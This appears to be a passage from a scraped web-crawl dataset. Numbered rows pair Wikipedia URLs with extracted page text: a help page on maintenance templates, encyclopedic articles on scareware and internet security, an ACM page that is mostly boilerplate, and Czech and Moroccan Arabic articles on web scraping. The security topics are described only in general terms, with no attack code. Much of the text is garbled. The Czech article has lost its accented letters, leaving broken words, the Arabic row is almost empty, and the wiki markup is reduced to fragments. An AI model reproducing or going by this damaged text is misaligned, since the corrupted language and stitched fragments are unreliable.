contextual pages to learn about the problem and what it is you need to do to take care of it. Again, some of the more common maintenance templates seen are addressed in the specific template guidance section below. Maintenance templates are not meant to be in articles permanently. Any user without a conflict of interest may remove a maintenance template in any of the following circumstances: You should not remove maintenance templates if any of the following apply: Have you carefully read the help pages and thoroughly fixed the problem? Or have you made a considered decision that the template is not, or is no longer, applicable? Great Now, to remove the maintenance template: That's it. Thank you Problems flagged by some templates may imply secondary problems that will still exist after you take care of the main issue. In such cases, it may be more appropriate to switch the template to another applicable one following your edits, rather than just removing it. The reasoning behind the change in templates should be addressed in the edit summary. A case in point is the Unreferenced template example used above. It is placed on pages with no references. Thus, adding just one suitable reference renders that maintenance template inapplicable. However, that change does not take care of the overarching issue of poor sourcing. In this example, a change to a different template may be appropriate, depending on the type, quality, depth, and manner of sourcing added to fix the issue, such as refimprove , No footnotes , Primary sources , or one of the many others listed at Wikipedia:Template messages Sources of articles. Conversely, some templates flag highly discrete issues where there is no need to consider a switch to another template. For example, if an article is "orphaned" no other articles in the main article namespace link to it then once that is taken care of (by the addition of links to it from other articles), the issue is gone entirely and the tag's removal is unambiguous. When a flagged issue has been addressed in parts of an article but remains in discrete sections, clarity may be served by replacing the template with a section variant, or by use of inline cleanup tags, if such versions of the template exist. In some cases, it may be helpful to request a review of a maintenance template's removal or proposed removal with the editor who initially added it to the article at issue. This section guides you on how to address some of the more common specific templates that may have brought you to this help page. More detailed information about the templates can be found by following the links to the templates themselves. Click "show" at the right to display the instructions. Some articles will be flagged for multiple discrete problems using a single template: Multiple issues . If you take care of one or more problems that it flags but not all, do not remove the template entirely but just those parameters in it that you have fixed. The example below shows three different issues flagged by this template: If you address the "orphaning" issue, but not the other two, remove just the line that flagged the orphan issue and leave the others intact. Thus, your removal would leave the template in this state. See the sections below for how to address some of the more common problems flagged by templates that may be wrapped into this template. All of Wikipedia's core content policies and guidelines have as a common denominator the need for reliable sourcing. For example, the content of Wikipedia articles must be verifiable in reliable sources; the notability of a topic demonstrated through such reliable sources that are secondary in nature, which are independent of the topic and treat the subject in substantive detail (not just "mere mentions"); and to establish that the content is not original research, the sources cited must directly support the material being presented without analysis or synthesis to reach or imply a conclusion that is not stated in the sources. Unreferenced , typically placed by the code Unreferenced date August 2024 , having redirects such as Unsourced , Unverified , No references , No sources , and Unref , and displaying when reading as: flags the issue of an article containing no references at all. This template no longer applies once a single reference appears in the article, whether placed through the preferred method of inline citations, ones appearing in a general references section, or even through such a poor method as including an embedded raw link. To address the issue, add citations to reliable sources. Because of their importance, Wikipedia contains numerous instruction pages on aspects of referencing. We suggest starting with Help:Referencing for beginners and Help:Introduction to referencing 1, and then seeing Wikipedia:Citing sources for a more involved treatment, noting that each contains see also sections linking to additional help pages, guides, and tutorials. A visual guide to placing inline citations through ref ... ref tags may also help, and appears below. In brief, anywhere you want a footnote to appear in a piece of text, you place an opening ref tag followed by the text of the citation which you want to appear at the bottom of the article, and close with a ref tag. Note the closing slash ( ). For multiple use of a single reference, the opening ref tag is given a name, like so: ref name "name" followed by the citation text and a closing ref tag. Each time you want to use that footnote again, you simply use the first element with a slash, like so: ref name "name" . For these references to appear, you must tell the software where to display them, using either the code references or, most commonly, the template, Reflist which can be modified to display the references in columns using Reflist colwidth 30em . Per our style guidelines, the references should be displayed in a separate section denominated "References" located after the body of the article. Multiple ref name "multiple" Citation text3. ref citation ref name "multiple" use. ref name "multiple" References Reflist Multiple 3 citation 3 use. 3 References Citation Cite web Cite book Cite news Cite journal Others Examples As noted higher on this page, unless you thoroughly source a page in response to this template, it may more appropriate to switch this template with a more specific one rather than simply removing it. Depending on the type, quality, depth, and manner of sourcing added to fix the issue, you might replace it with refimprove , No footnotes , Primary sources or a host of others listed at Wikipedia:Template messages Sources of articles. All of Wikipedia's core content policies and guidelines have as a common denominator the need for reliable sourcing. For example, the content of Wikipedia articles must be verifiable in reliable sources; the notability of a topic demonstrated through such reliable sources that are secondary in nature, which are independent of the topic and treat the subject in substantive detail (not just "mere mentions"); and to establish that the content is not original research, the sources cited must directly support the material being presented without analysis or synthesis to reach or imply a conclusion that is not stated in the sources. Refimprove , typically placed by the code Refimprove date August 2024 , having redirects such as Improve references , Verify , More sources and Citations needed , and displaying when reading as: flags the issue of an article that has some, but insufficient inline citations to support the material currently in the article. It should not be used for articles with no sources at all ( unreferenced should be used instead), nor for articles without inline citations but which contain some sources ( No footnotes should be used instead), nor for an article on living persons ( BLP sources should be used instead). This template no longer applies once an article has been made fairly well-sourced. To address the issue, add additional inline citations to reliable sources for all significant statements in the article. Whether or not an article has been rendered "fairly well sourced" may involve a judgment call, but in any event, the sources used must be reliable ones, and articles should not rely predominantly on primary sources, but rather on secondary sources. Note the minimum: all quotations, material whose verifiability has been challenged or is likely to be challenged, and contentious material, whether negative, positive, or neutral, about living persons, must include an inline citation that directly supports the material. All of Wikipedia's core content policies and guidelines have a common denominator: the need for reliable sourcing. For example, the content of Wikipedia articles must be verifiable in reliable sources; the notability of a topic demonstrated through such reliable sources that are secondary in nature, which are independent of the topic and treat the subject in substantive detail (not just "mere mentions"); and to establish that the content is not original research, the sources cited must directly support the material being presented without analysis or synthesis to reach or imply a conclusion that is not stated in the sources. No footnotes , typically placed by the code No footnotes date August 2024 , and having redirects such as Citations , No citations , Inline citations and No inline citations , and displaying when reading as: flags the issue of an article that contains some form of sourcing but lacks the precision of inline citations to associate given portions of material with a specific reliable source(s) that support that material. Inline citations make verifiability accessible. In short, in the absence of an inline citation that associates specific material to a specific source, it becomes very difficult for a reader to check what sources, given in only some general manner, verify what items of content. To address the issue, add inline citations to reliable sources, ideally for all significant statements in the article. Note that at a minimum: all quotations, material whose verifiability has been challenged or is likely to be challenged, and contentious material, whether negative, positive, or neutral, about living persons, must include an inline citation that directly supports the material. There are many instruction pages that directly and indirectly give guidance on adding inline citations. We suggest starting with Help:Referencing for beginners and Help:Introduction to referencing 1, and then seeing Wikipedia:Citing sources for a more involved treatment, noting that each contains see also sections linking to additional help pages, guides, and tutorials. A visual guide to placing inline citations through ref ... ref tags may also help, and appears below. In brief, anywhere you want a footnote to appear in a piece of text, you place an opening ref tag followed by the text of the citation which you want to appear at the bottom of the article, and close with a ref tag. Note the closing slash ( ). For multiple use of a single reference, the opening ref tag is given a name, like so: ref name "name" followed by the citation text and a closing ref tag. Each time you want to use that footnote again, you simply use the first element with a slash, like so: ref name "name" . For these references to appear, you must tell the software where to display them, using either the code references or, most commonly, the template, Reflist which can be modified to display the references in columns using Reflist colwidth 30em . Per our style guidelines, the references should be displayed in a separate section denominated "References" located after the body of the article. Multiple ref name "multiple" Citation text3. ref citation ref name "multiple" use. ref name "multiple" References Reflist Multiple 3 citation 3 use. 3 References Citation Cite web Cite book Cite news Cite journal Others Examples Primary sources , typically placed by the code Primary sources date August 2024 , having among other redirects Primary , and displaying when reading as: flags the issue of an article that too heavily relies on primary sources original materials that are close to an event; often accounts written by people who are directly involved as opposed to secondary, and to some extent, tertiary sources. Primary sources have their place but they must be used carefully and are easy to misuse. Typically, they should only be used for straightforward, descriptive statements of facts that can be verified by any educated person with access to the primary source but without further, specialized knowledge. They should not be used to support content that presents interpretation, analysis, evaluation, or synthesis, and should not be the predominant form of sourcing in an article. Moreover, primary sources are generally not useful to demonstrate a topic's notability. To address the issue, add citations predominantly to secondary sources. Often this involves replacing some of the primary sources with secondary sources, and not just adding them alongside existing ones—especially where the primary source is being used for an invalid purpose such as interpretive claims and synthesis. Finding secondary sources is a large topic but make use of Google Books, News, and Scholar; find local newspaper archives; go to a library; if you have access, use pay subscription services like JSTOR, Newspaperarchive.com; Ancestry.com, etc.; see our guide on free English newspaper sources and others listed here; request access to pay prescription sources at WP:RX. If insufficient reliable secondary and independent sources exist treating a topic in substantive detail, then Wikipedia should not have an article on the topic. Remember that no amount of editing can overcome a lack of notability. Wikipedia is an encyclopedia, a specific type of reference work properly containing articles on topics of knowledge. Wikipedia employs the concept of notability to avoid indiscriminate inclusion of topics by attempting to ensure that the subjects of articles are "worthy of notice" by only including articles on topics that the world has taken note of by substantively treating them in reliable sources unconnected with the topic. The general notability standard thus presumes that topics are notable if they have "received significant coverage in reliable sources that are independent of the subject". Notability , typically placed by the code Notability date August 2024 , having redirects such as Notable , Non-notable , Nn and Significance , and displaying when reading as: (or some variation linking to one of the subject-specific notability guidelines) questions whether a topic is notable. As stated in the template, addressing the issue requires adding citations to reliable secondary sources. There are several common mistakes seen in addressing this issue: If insufficient reliable secondary and independent sources exist treating a topic in substantive detail, then Wikipedia should not have an article on the topic. Remember that no amount of editing can overcome a lack of notability. Advert , typically placed by the code Advert date August 2024 , and having redirects such as Advertisement , Advertising , Ad and Puff , and displaying when reading as: flags the issue of an article that reads like an advertisement. For example, such articles may tell users to buy a company's product, provide price lists, give links to online sellers, use unencyclopedic or meaningless buzzwords, be filled with peacock language and read like the website of the article's topic or a press release touting its virtues, rather than that of a neutrally-written encyclopedia article about the topic. Advertisements are by no means limited to commercial topics and indeed are often seen for all manner of others, such as "noble causes", religious spiritual leaders, sports teams, gaming clans and so forth. If the article's main problem is not advertising per se, then you can change the tag to something more appropriate, such as COI or Peacock or POV check . Pages that are exclusively promotional and would need to be fundamentally rewritten to become encyclopedic may be tagged for speedy deletion under section G11 of the criteria using db-g11 or db-spam . To address the issue, rewrite the article from a neutral point of view which is not just about the wording and tone, but also what the article covers and what it does not cover. Wikipedia articles should represent fairly, proportionately, and, as far as possible, without editorial bias, all of the significant views that have been published by reliable sources on a topic. Removing all promotional language is a good start, but depending on what is left, may only be a surface treatment. See what you can salvage, but often editors strip out all but the most basic content, leaving it in a stub state. If you want to build a solid article, explore the existence of independent sources for the topic, and build it from the ground up. POV , typically placed by the code POV date August 2024 , and having redirects such as NPOV , POV dispute , Neutrality , Neutral and Not neutral , and displaying when reading as: flags the issue of an article that has been identified as having a serious issue of balance, the lack of a neutral point of view, and the tagger wishes to attract editors with different viewpoints to the article. An unbalanced or non-neutral article does not fairly represent the balance of perspectives of high-quality, reliable secondary sources. This tag is meant to be accompanied by an explanation on the article's talk page about why it was added, identifying specific issues that are actionable within Wikipedia's content policies. This template is not meant to be a permanent resident on any article. You may remove this template whenever any one of the following is true: Lead missing , typically placed by the code Lead missing date August 2024 , and having redirects such as No lead , Nointro , No lead section , Lead absent and Intro needed , and displaying when reading as: flags the issue of an article that fails to follow Wikipedia's standard article layout guidelines by introducing the reader to the topic in a lead section containing a summary of the most important article contents. The lead should stand on its own as a concise overview of the article's topic. A good lead section cultivates the reader's interest in reading more of the article, but not by teasing the reader or hinting at content that follows. It should identify the topic, establish context, explain why the topic is notable, and summarize the most important points, including any prominent controversies. To address the issue, write a lead section. The size of an appropriate lead will depend on the breadth of the article but it should be no more than four well-composed paragraphs, and should generally not contain content that is not already present in the body of the article. Current , typically placed by the code Current date August 2024 , and displaying when reading as: (or a subject-specific variation listed on Wikipedia:Current event templates) warns editors and readers about an article that is the subject of a current event, such as a breaking news story, that is accordingly experiencing a great flux of edits and is in a fast-changing state. Wikipedia attracts numerous editors who want to update articles in real time immediately after such current events are published. However, sources for breaking news reports often contain serious inaccuracies, so these templates can also draw attention to the need to add improved sources as soon as they become available. The template should generally be removed when the event described is no longer receiving massive editing attention. It is not meant to be a general disclaimer indicating that an article's contents may not be accurate, or to mark an article that merely has recent news articles about the topic (if it were, hundreds of thousands of articles would have the Current template, with no informational consequence). If the article continues to have sourcing or cleanup issues, a more appropriate maintenance template should be used instead. Linkrot , typically placed by the code Linkrot date August 2024 , and displaying when reading as: flags an article as having bare URLs, URLs that are used as references or external links without contextual information. These bare URLs are particularly vulnerable to link rot, as the record of the reference depends on the hosting website maintaining the current site structure, which is not guaranteed. A change in the underlying URL could make the reference unusable. The full citation format, on the other hand, preserves information (such as title and author) that can be used to restore a version of the reference that is still accessible. In addition, bare URLs can be less visually pleasing if the underlying URL is long. To address this issue, convert all bare URLs used as references to the appropriate citation template format. For bare URLs which are not used as references, use the following format: bare URL Descriptive text . Depending on the specific URL, it may be necessary to use an archiving service to restore an URL. More information is available at Repairing a dead link. As noted previously, most templates contain links to guidance pages. Additionally, many templates have documentation that provides more information about the template's flagged issue, which is displayed when you visit the template page itself. To access the template and thereby see its documentation, type into the search field Template:, followed by the name of the template, seen when you view its placement in the Edit interface (typically found in the first lines of the article). The first "parameter" is the name of the template. For example, if you found this in the Edit interface, Unreferenced date August 2024 , then you would visit the template itself by searching for Template:Unreferenced. The accompanying documentation for all maintenance templates, if it exists, can be located in this way. If you've read through this page and are still confused about what needs to be done to fix an issue on a page and remove a maintenance template, try asking at the Teahouse, a page designed for new users to ask questions. Alternatively, you could try the more general Help desk, or seek live assistance at the IRC channel: wikipedia-en-help. |
95 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Scareware | Scareware is a form of malware which uses social engineering to cause shock, anxiety, or the perception of a threat in order to manipulate users into buying unwanted software 1 (or products). Scareware is part of a class of malicious software that includes rogue security software, ransomware and other scam software that tricks users into believing their computer is infected with a virus, then suggests that they download and pay for fake antivirus software to remove it. 2 Usually the virus is fictional and the software is non-functional or malware itself. 3 According to the Anti-Phishing Working Group, the number of scareware packages in circulation rose from 2,850 to 9,287 in the second half of 2008. 4 In the first half of 2009, the APWG identified a 585% increase in scareware programs. 5 The "scareware" label can also apply to any application or virus which pranks users with intent to cause anxiety or panic. Internet security writers use the term "scareware" to describe software products that produce frivolous and alarming warnings or threat notices, most typically for fictitious or useless commercial firewall and registry cleaner software. This class of program tries to increase its perceived value by bombarding the user with constant warning messages that do not increase its effectiveness in any way. Software is packaged with a look and feel that mimics legitimate security software in order to deceive consumers. 6 Some websites display pop-up advertisement windows or banners with text such as: "Your computer may be infected with harmful spyware programs. 7 Immediate removal may be required. To scan, click 'Yes' below. These websites can go as far as saying that a user's job, career, or marriage would be at risk. Products with advertisements such as these are often considered scareware. Serious scareware applications qualify as rogue software. Some scareware is not affiliated with any other installed programs. A user can encounter a pop-up on a website indicating that their PC is infected. 8 In some scenarios, it is possible to become infected with scareware even if the user attempts to cancel the notification. These popups are specially designed to look like they come from the user's operating system when they are actually a webpage. A 2010 study by Google found 11,000 domains hosting fake anti-virus software, accounting for 50% of all malware delivered via internet advertising. 9 Starting on March 29, 2011, more than 1.5 million web sites around the world have been infected by the LizaMoon SQL injection attack spread by scareware. 10 11 Research by Google discovered that scareware was using some of its servers to check for internet connectivity. The data suggested that up to a million machines were infected with scareware. 12 The company has placed a warning in the search results for users whose computers appear to be infected. Another example of scareware is Smart Fortress. This site scares the victim into thinking they have many viruses on their computer and asks them to buy a professional service. 13 Some forms of spyware also qualify as scareware because they change the user's desktop background, install icons in the computer's notification area (under Microsoft Windows), and claiming that some kind of spyware has infected the user's computer and that the scareware application will help to remove the infection. In some cases, scareware trojans have replaced the desktop of the victim with large, yellow text reading "Warning You have spyware or a box containing similar text, and have even forced the screensaver to change to "bugs" crawling across the screen. 14 Winwebsec is the term usually used to address the malware that attacks the users of Windows operating system and produces fake claims similar to that of genuine anti-malware software. 15 SpySheriff exemplifies spyware and scareware: it purports to remove spyware, but is actually a piece of spyware itself, often accompanying SmitFraud infections. 16 Other antispyware scareware may be promoted using a phishing scam. Another approach is to trick users into uninstalling legitimate antivirus software, such as Microsoft Security Essentials, or disabling their firewall. 17 Since antivirus programs typically include protection against being tampered with or disabled by other software, scareware may use social engineering to convince the user to disable programs which would otherwise prevent the malware from working. In 2005, Microsoft and Washington state successfully sued Secure Computer (makers of Spyware Cleaner) for $1 million over charges of using scareware pop-ups. 18 Washington's attorney general has also brought lawsuits against Securelink Networks, Softwareonline.com, 19 High Falls Media, and the makers of Quick Shield. 20 In October 2008, Microsoft and the Washington attorney general filed a lawsuit against two Texas firms, Branch Software and Alpha Red, producers of the Registry Cleaner XP scareware. 21 The lawsuit alleges that the company sent incessant pop-ups resembling system warnings to consumers' personal computers stating "CRITICAL ERROR MESSAGE - REGISTRY DAMAGED AND CORRUPTED", before instructing users to visit a web site to download Registry Cleaner XP at a cost of $39.95. On December 2, 2008, the U.S. Federal Trade Commission ("FTC") filed a Complaint in federal court against Innovative Marketing, Inc., ByteHosting Internet Services, LLC, as well as individuals Sam Jain, Daniel Sundin, James Reno, Marc D’Souza, and Kristy Ross. The Complaint also listed Maurice D’Souza as a Relief Defendant, alleged that he held proceeds of wrongful conduct but not accusing him of violating any law. The FTC alleged that the other Defendants violated the FTC Act by deceptively marketing software, including WinFixer, WinAntivirus, DriveCleaner, ErrorSafe, and XP Antivirus. According to the complaint, the Defendants falsely represented that scans of a consumer's computer showed that it had been compromised or infected and then offered to sell software to fix the alleged problems. 22 23 24 Another type of scareware involves software designed to literally scare the user through the use of unanticipated shocking images, sounds or video. Recent research has also introduced a new detection technology designed to identify scareware social engineering attacks with enhanced resilience. This approach targets the visual images presented to end users, which is a layer that attackers cannot easily obscure. 27 |
96 | https://en.wikipedia.org/wiki/Web_scraping | https://doi.org/10.1145%2F1281192.1281287 | This alert has been successfully added and will be sent to: You will be notified whenever a record that you have chosen has been cited. To manage your alert preferences, click on the button below. Please log in to your account Information systems Information retrieval Information storage systems Web information is often presented in the form of record, e.g., a product record on a shopping website or a personal profile on a social utility website. Given a host webpage and related information needs, how to identify relevant records as well as ... We consider the problem of template-independent news extraction. The state-of-the-art news extraction method is based on template-level wrapper induction, which has two serious limitations. 1) It cannot correctly extract pages belonging to an unseen ... In this paper, we propose an adaptive wrapper generator that can generate adaptable wrapper for adapting networked information sources (NIS) format changes. When NIS's format changed, the adaptable wrapper can start recovery phase to discover the ... Yahoo , USA Cornell University, USA University of Vermont, USA Association for Computing Machinery New York, NY, United States Check if you have access through your login credentials or your institution to get full access on this article. View or Download as a PDF file. View online with eReader. Copied Copying failed. We are preparing your search results for download ... We will inform you here when the file is ready. Your file of search results citations is now ready. Your search export query has expired. Please try again. |
97 | https://en.wikipedia.org/wiki/Web_scraping | https://cs.wikipedia.org/wiki/Web_scraping | Web scraping, web harvesting nebo extrakce dat z webu ozna uj zp sob z sk v n strukturovan ch dat z webov ch str nek. Spo v v extrahov n dat um st n ch na webov ch str nk ch do u ite n j ho form tu, kter je mo n snadno d le strojov zpracov vat. Web scraping je sice mo n prov d t ru n , ast ji se ale term n pou v pro automatick harvestov n , prov d n pomoc web crawler . Web harvesting je formou stahov n dat z webu, v pr b hu kter ho se z webu stahuj konkr tn data a ukl daj se do datab ze nebo tabulky, aby s nimi bylo mo n pozd ji pracovat. Web scraping webov str nky zahrnuje jej na ten a extrakci z n . Fetching je stahov n str nky (kter prov d prohl e , kdy si u ivatel str nku prohl ). Proto je web crawling hlavn sou st web scrapingu, aby se str nky z skaly pro pozd j zpracov n . Po na ten m e n sledovat extrakce. Obsah str nky m e b t analyzov n, prohled v n, p eform tov n, mohou z n b t data zkop rovan do tabulky nebo vlo ena do datab ze. Web scrapery obvykle ze str nky n co vyjmou, aby to vyu ily k jin mu elu na jin m m st . Web scraping se pou v nap klad k z sk v n kontakt i jako sou st aplikac pou van ch k indexaci webu, vyt ov n webu a z sk v n dat z webu. Vyu t jej m ete pro sledov n zm n online cen konkr tn ch produkt a porovn v n cen, k z sk v n recenz produkt (ke sledov n konkurence), shroma ov n nab dek nemovitost , sledov n daj o po as , zji ov n zm n webov ch str nek, v zkumu, sledov n online p tomnosti a reputace, web mashup a integraci webov ch dat. Velmi asto z sk v te data z webu proto, abyste na jejich z klad mohli prov d t n jak dal akce (automaticky dost vat e-mailov upozorn n , pokud se na webu n co zm n , nebo automaticky odes lat zm n n data do firemn ho CRM). Tomu se k automatizace webu. Pou v se v dy, kdy webov str nka, kter v s zaj m , nem dn API rozhran - to znamen , e neposkytuje dn zp sob, jak st hnout data ve strukturovan podob . Nebo jeho rozhran API neposkytuje v echna data nebo je jednodu e p li obt n je pou vat. Mezi obvykl p pady, kdy se scraping dat z webu hod , pat situace, kdy pot ebujete kontaktn daje z webov ch str nek (contact scrapping). Technicky jde o vyhled n a zkop rov n jmen, telefonn ch sel, e-mailov ch adres lid nebo firem a jejich URL adres do seznamu. Scrapovat je mo n jen takov daje, kter jsou ve ejn dostupn , nap klad z webov ch str nek firem, nebo ve ejn ch profil na soci ln ch s t ch. K dal m vyu it m pat nap klad sledov n konkurence a cen, kter nab z u konkr tn ch produkt . Crawlery pravideln stahuj data o cen ch produkt konkurence, nebo reaguj na pohyb a zm nu dan ceny. Toto vyu v n je b n nap v emi trhy - od e-commerce a po farmaceutick byznys. Web Scaping je mo n vyu t i pokud chcete oslovit nov z kazn ky nebo na z klad dat na webu z skat p ehled o trhu. Webov str nky jsou vytv eny pomoc textov ch zna kovac ch jazyk (HTML a XHTML) a asto obsahuj mno stv u ite n ch dat v textov podob . V t ina webov ch str nek je v ak navr ena pro koncov u ivatele, nikoli pro snadn automatizovan pou it . V d sledku toho byly vyvinuty specializovan n stroje a software, kter usnad uj vy krab v n webov ch str nek. Nov j formy web scrapingu zahrnuj sledov n datov ch kan l z webov ch server . Jako transportn mechanismus pro ukl d n dat mezi klientem a webov m serverem se nap klad b n pou v JSON. Existuj metody, kter n kter webov str nky pou vaj k zabr n n web scrapingu, nap klad detekce a zak z n robot m proch zet (prohl et) jejich str nky. V reakci na to existuj syst my web scrapingu, kter se spol haj na pou it technik rozboru DOM, po ta ov ho vid n a zpracov n p irozen ho jazyka k simulaci lidsk ho prohl en , aby bylo mo n shroma ovat obsah webov ch str nek pro jejich offline rozbor. Web Scraping je proces automatick ho vyt ov n dat nebo shroma ov n informac z webov ch str nek. Jedn se o oblast, kter se velmi rychle vyv j a m n . M spole n c l s viz s mantick ho webu, ambici zn iniciativou, kter st le vy aduje pr lom ve zpracov n textu, d k s mantick mu porozum n , um l inteligenci a interakci lov ka s po ta em. Sou asn e en pro scraping webu sahaj od ad-hoc e en , kter vy aduj lidsk sil , a po pln automatizovan syst my, kter jsou schopny p ev st cel webov str nky na strukturovan informace, ov em s ur it mi omezen mi. Nejjednodu formou web scrapingu je ru n kop rov n a ru n vkl d n dat z webov str nky do textov ho souboru nebo tabulky. N kdy ani sebelep technologie web scrapingu nedok e nahradit ru n zkoum n , kop rov n a vkl d n dat do c lov datab ze lov kem. N kdy to m e b t jedin funk n e en , pokud webov str nky pro scraping v slovn nastavuj p ek ky, kter br n strojov automatizaci. Jednoduch , ale v konn p stup k z sk v n informac z webov ch str nek m e b t zalo en na p kazu grep syst mu UNIX nebo na mo nostech porovn v n regul rn ch v raz v programovac ch jazyc ch (nap klad Perl nebo Python). Statick a dynamick webov str nky lze z skat odesl n m po adavk HTTP na vzd len webov server pomoc programov n socket . Mnoho webov ch str nek obsahuje velk mno stv str nek generovan ch dynamicky z podkladov ho strukturovan ho zdroje, jako je datab ze. Data stejn kategorie jsou obvykle zak dov na do podobn ch str nek pomoc spole n ho skriptu nebo ablony. Program, kter takov ablony v ur it m informa n m zdroji detekuje, extrahuje jeho obsah a p ev d jej do rela n podoby, se v data miningu naz v wrapper. Algoritmy pro generov n wrapper p edpokl daj , e vstupn str nky syst mu pro indukci wrapper odpov daj spole n ablon a e je lze snadno identifikovat z hlediska spole n ho sch matu URL k anal ze str nek HTML a k z sk v n a transformaci obsahu str nek lze nav c pou t n kter polostrukturovan datov dotazovac jazyky, nap klad XQuery a jazyk HTQL 1 . Vlo en m plnohodnotn ho webov ho prohl e e, jako je Internet Explorer nebo ovl dac prvek prohl e e Mozilla Firefox, mohou programy na tat dynamick obsah generovan skripty na stran klienta. Tyto ovl dac prvky prohl e e tak analyzuj webov str nky do stromu DOM, na jeho z klad mohou programy na tat sti str nek. K anal ze v sledn ho stromu DOM lze pou t jazyky, jako je XPath. Existuje n kolik spole nost , kter vyvinuly platformy pro vertik ln agregaci. Tyto platformy vytv ej a monitoruj mno stv "bot " pro konkr tn vertik ly bez " lov ka v z b ru" (bez p m asti lov ka) a bez pr ce souvisej c s konkr tn m c lov m webem. P prava zahrnuje vytvo en znalostn b ze pro celou vertik lu a platforma pak automaticky vytv boty. Robustnost platformy se m kvalitou z skan ch informac (obvykle po tem pol ) a jej k lovatelnost (jak rychle dok e k lovat na stovky nebo tis ce web ). Tato k lovatelnost se v t inou vyu v k c len na long tail weby, kter b n agreg tory pova uj za komplikovan nebo p li pracn na z sk v n obsahu. Scrapovan str nky mohou obsahovat metadata nebo s mantick zna ky a anotace, kter lze pou t k vyhled n konkr tn ch tr k dat. Pokud jsou anotace vlo eny do str nek, jak to d l Microformat, lze na tuto techniku pohl et jako na zvl tn p pad DOM parsov n . V jin m p pad jsou anotace uspo dan do s mantick vrstvy ulo eny a spravov ny odd len od webov ch str nek, tak e scrapery mohou p ed scrapov n m str nek na st datov sch ma a instrukce z t to vrstvy. Existuj snahy vyu vaj c strojov u en a po ta ov vid n , kter se pokou ej identifikovat a extrahovat informace z webov ch str nek vizu ln interpretac str nek tak, jak by to mohl ud lat lov k. V tomto l nku byl pou it p eklad textu z l nku Web scraping na anglick Wikipedii. |
98 | https://en.wikipedia.org/wiki/Web_scraping | https://ary.wikipedia.org/wiki/%D8%AA%D8%BA%D8%B1%D8%A7%D9%81_%D9%84%D9%88%D9%8A%D8%A8 | ( Web scraping) . . . 1 : data extraction . . . |
99 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Internet_security | Internet security is a branch of computer security. It encompasses the Internet, browser security, web site security, 1 and network security as it applies to other applications or operating systems as a whole. Its objective is to establish rules and measures to use against attacks over the Internet. 2 The Internet is an inherently insecure channel for information exchange, with high risk of intrusion or fraud, such as phishing, 3 online viruses, trojans, ransomware and worms. Many methods are used to combat these threats, including encryption and ground-up engineering. 4 Malicious software comes in many forms, such as viruses, Trojan horses, spyware, and worms. A denial-of-service attack (DoS) or distributed denial-of-service attack (DDoS) is an attempt to make a computer resource unavailable to its intended users. It works by making so many service requests at once that the system is overwhelmed and becomes unable to process any of them. DoS may target cloud computing systems. 5 According to business participants in an international security survey, 25% of respondents experienced a DoS attack in 2007 and another 16.8% in 2010. citation needed DoS attacks often use bots (or a botnet) to carry out the attack. Phishing targets online users in an attempt to extract sensitive information such as passwords and financial information. 6 Phishing occurs when the attacker pretends to be a trustworthy entity, either via email or a web page. Victims are directed to web pages that appear to be legitimate, but instead route information to the attackers. Tactics such as email spoofing attempt to make emails appear to be from legitimate senders, or long complex URLs hide the actual website. 7 8 Insurance group RSA claimed that phishing accounted for worldwide losses of $10.8 billion in 2016. 9 A man-in-the-middle (MITM) attack is a type of cyber attack. Cybercriminals can intercept data sent between people to steal, eavesdrop or modify data for certain malicious purposes, such as extorting money and identity theft. Public WiFi is often insecure because monitoring or intercepting Web traffic is unknown. citation needed Applications used to access Internet resources may contain security vulnerabilities such as memory safety bugs or flawed authentication checks. Such bugs can give network attackers full control over the computer. 10 11 TCP IP protocols may be secured with cryptographic methods and security protocols. These protocols include Secure Sockets Layer (SSL), succeeded by Transport Layer Security (TLS) for web traffic, Pretty Good Privacy (PGP) for email, and IPsec for network layer security. 12 IPsec is designed to protect TCP IP communication in a secure manner. It is a set of security extensions developed by the Internet Engineering Task Force (IETF). It provides security and authentication at the IP layer by transforming data using encryption. Two main types of transformation form the basis of IPsec: the Authentication Header (AH) and ESP. They provide data integrity, data origin authentication, and anti-replay services. These protocols can be used alone or in combination. Basic components include: The algorithm allows these sets to work independently without affecting other parts of the implementation. The IPsec implementation is operated in a host or security gateway environment giving protection to IP traffic. Threat Modeling tools helps you to proactively analyze the cyber security posture of a system or system of systems and in that way prevent security threats. Multi-factor authentication (MFA) is an access control method in which a user is granted access only after successfully presenting separate pieces of evidence to an authentication mechanism two or more from the following categories: knowledge (something they know), possession (something they have), and inference (something they are). 13 14 Internet resources, such as websites and email, may be secured using this technique. Some online sites offer customers the ability to use a six-digit code which randomly changes every 30 60 seconds on a physical security token. The token has built-in computations and manipulates numbers based on the current time. This means that every thirty seconds only a certain array of numbers validate access. The website is made aware of that device's serial number and knows the computation and correct time to verify the number. After 30 60 seconds the device presents a new random six-digit number to log into the website. 15 Email messages are composed, delivered, and stored in a multiple step process, which starts with the message's composition. When a message is sent, it is transformed into a standard format according to RFC 2822. 16 Using a network connection, the mail client sends the sender's identity, the recipient list and the message content to the server. Once the server receives this information, it forwards the message to the recipients. Pretty Good Privacy provides confidentiality by encrypting messages to be transmitted or data files to be stored using an encryption algorithm such as Triple DES or CAST 128. Email messages can be protected by using cryptography in various ways, such as the following: The first two methods, message signing and message body encryption, are often used together; however, encrypting the transmissions between mail servers is typically used only when two organizations want to protect emails regularly sent between them. For example, the organizations could establish a virtual private network (VPN) to encrypt communications between their mail servers. 17 Unlike methods that only encrypt a message body, a VPN can encrypt all communication over the connection, including email header information such as senders, recipients, and subjects. However, a VPN does not provide a message signing mechanism, nor can it provide protection for email messages along the entire route from sender to recipient. A Message authentication code (MAC) is a cryptography method that uses a secret key to digitally sign a message. This method outputs a MAC value that can be decrypted by the receiver, using the same secret key used by the sender. The Message Authentication Code protects both a message's data integrity as well as its authenticity. 18 A computer firewall controls access to a single computer. A network firewall controls access to an entire network. A firewall is a security device — computer hardware or software — that filters traffic and blocks outsiders. It generally consists of gateways and filters. Firewalls can also screen network traffic and block traffic deemed unauthorized. Firewalls restrict incoming and outgoing network packets. Only authorized traffic is allowed to pass through it. Firewalls create checkpoints between networks and computers. Firewalls can block traffic based on IP source and TCP port number. They can also serve as the platform for IPsec. Using tunnel mode, firewalls can implement VPNs. Firewalls can also limit network exposure by hiding the internal network from the public Internet. A packet filter processes network traffic on a packet-by-packet basis. Its main job is to filter traffic from a remote IP host, so a router is needed to connect the internal network to the Internet. The router is known as a screening router, which screens packets leaving and entering the network. In a stateful firewall the circuit-level gateway is a proxy server that operates at the network level of an Open Systems Interconnect (OSI) model and statically defines what traffic will be allowed. Circuit proxies forward network packets (formatted data) containing a given port number, if the port 